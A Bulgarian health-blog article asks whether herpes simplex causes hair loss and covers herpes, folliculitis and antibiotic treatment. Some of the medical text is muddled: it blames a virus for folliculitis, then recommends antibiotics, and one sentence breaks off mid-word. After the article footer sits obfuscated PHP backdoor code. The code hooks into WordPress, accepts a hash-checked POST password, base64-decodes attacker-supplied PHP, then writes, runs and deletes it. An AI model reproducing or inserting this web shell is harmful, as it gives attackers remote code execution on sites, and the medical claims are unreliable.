Предизвиква ли херпесът косопад? | Косопад

Предизвиква ли херпесът косопад?

Херпес симплексът е заразна болест, която се класифицира като вирална инфекция. Има два типа от този вирус – херпес симплекс 1, който се предава при близък контакт като целувка, и херпес симплекс 2 или генитален херпес, който се предава при сексуални контакти. Когато веднъж се заразите, ще имате постоянни епизоди, докато вирусът е в латентна форма в нервните тъкани, докато се активира.

folikulit-kosopad

Косопадът заради херпес симплекс не е обичаен симптом и се среща само при фоликулит.

КОСОПАД

Може да се дължи на различни фактори. Може да е причинен от хормонални промени, наследственост, липса на витамини и прекаляване с козметични продукти. Дефицитът на желязо също е честа причина за косопад.

ХЕРПЕС СИМПЛЕКС

Херпесът може да причини болки и депресия. В началото се появяват мехури, дискомфорт и болки като при изгаряне. Също така може да се появят симптоми като при грип – температура, болки в ставите и др. След това се появява по- herpes-kosopadрядко. Няма лек за херпеса. Превенцията е единственият начин да не се заразите с херпес.

ФОЛИКУЛИТ

Това състояние може да причини косопад. Фоликулит  означава възпаление на корените на космите. Представлява червена и малка възпалена зона в отвора на космения фоликул. Вирусът прониква в корена, а косата пада.

ЛЕЧЕНИЕ

Антибиотиците са подходящи за по- малки фоликулити. При по- тежка инфекция, се обърнете към лекар за предписание на специални антибиотици.

09. март 2014 18:58:08 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}